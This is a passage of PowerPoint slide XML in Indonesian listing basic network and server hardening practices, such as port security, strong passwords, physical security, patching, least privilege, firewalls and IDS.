            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Kata Sandi yang Kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang Aman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Nonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permukaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada server. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Terapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Patch dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Lunak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peningkatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Hak Istimewa Paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istimewa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suatu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusupi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Firewall dan Intrusion Detection Systems (IDS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperingatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
